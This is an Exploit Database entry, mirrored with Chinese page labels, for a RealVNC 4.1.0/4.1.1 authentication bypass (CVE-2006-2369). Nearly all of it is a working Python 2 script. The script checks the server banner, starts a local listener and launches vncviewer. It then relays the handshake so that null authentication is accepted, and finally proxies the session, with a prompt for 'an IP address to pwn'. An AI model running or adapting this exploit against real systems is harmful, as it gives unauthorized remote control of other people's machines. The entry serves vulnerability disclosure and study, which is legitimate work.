RealVNC 4.1.0/4.1.1 – Authentication Bypass

• Exploit Database
• 11 阅读

• 作者： fdiskyou
  日期： 2012-05-13
• 类别：

  • remote
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/36932/

• # Exploit Title: RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit
  # Date: 2012-05-13
  # Author: @fdiskyou
  # e-mail: rui at deniable.org
  # Version: 4.1.0 and 4.1.1
  # Tested on: Windows XP
  # CVE: CVE-2006-2369 
  # Requires vncviewer installed
  # Basic port of hdmoore/msf2 perl version to python for fun and profit (ease of use)
  import select
  import thread
  import os
  import socket
  import sys, re
  
  BIND_ADDR = '127.0.0.1'
  BIND_PORT = 4444
  
  def pwn4ge(host, port):
  	socket.setdefaulttimeout(5)
  	server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  	try:
  		server.connect((host, port))
  	except socket.error, msg:
  		print '[*] Could not connect to the target VNC service. Error code: ' + str(msg[0]) + ' , Error message : ' + msg[1] 
  		sys.exit();
  	else:
  		hello = server.recv(12)
  		print "[*] Hello From Server: " + hello
  		if hello != "RFB 003.008\n":
  			print "[*] The remote VNC service is not vulnerable"
  			sys.exit()
  		else:
  			print "[*] The remote VNC service is vulnerable"
  			listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
  			try:
  				listener.bind((BIND_ADDR, BIND_PORT))
  			except socket.error , msg:
  				print '[*] Bind failed. Error Code : ' + str(msg[0]) + ' Message ' + msg[1]
  				sys.exit()
  			print "[*] Listener Socket Bind Complete"
  			listener.listen(10)
  			print "[*] Launching local vncviewer"
  			thread.start_new_thread(os.system,('vncviewer ' + BIND_ADDR + '::' + str(BIND_PORT),))
  			print "[*] Listener waiting for VNC connections on localhost"
  			client, caddr = listener.accept()
  			listener.close()
  			client.send(hello)
  			chello = client.recv(12)
  			server.send(chello)
  			methods = server.recv(2)
  			print "[*] Auth Methods Recieved. Sending Null Authentication Option to Client"
  			client.send("\x01\x01")
  			client.recv(1)
  			server.send("\x01")
  			server.recv(4)
  			client.send("\x00\x00\x00\x00")
  			print "[*] Proxying data between the connections..."
  			running = True
  			while running:
  				selected = select.select([client, server], [], [])[0]
  				if client in selected:
  					buf = client.recv(8192)
  					if len(buf) == 0:
  						running = False
  					server.send(buf)
  				if server in selected and running:
  					buf = server.recv(8192)
  					if len(buf) == 0:
  						running = False
  					client.send(buf)
  				pass
  			client.close()
  		server.close()
  	sys.exit()
  
  def printUsage():
  	print "[*] Read the source, Luke!"
  
  def main():
  	try:
  		SERV_ADDR = sys.argv[1]
  		SERV_PORT = sys.argv[2]
  	except:
  		SERV_ADDR = raw_input("[*] Please input an IP address to pwn: ")
  		SERV_PORT = 5900
  	try:
  		socket.inet_aton(SERV_ADDR)
  	except socket.error:
  		printUsage()
  	else:
  		pwn4ge(SERV_ADDR, int(SERV_PORT))
  
  if __name__ == "__main__":
  	main()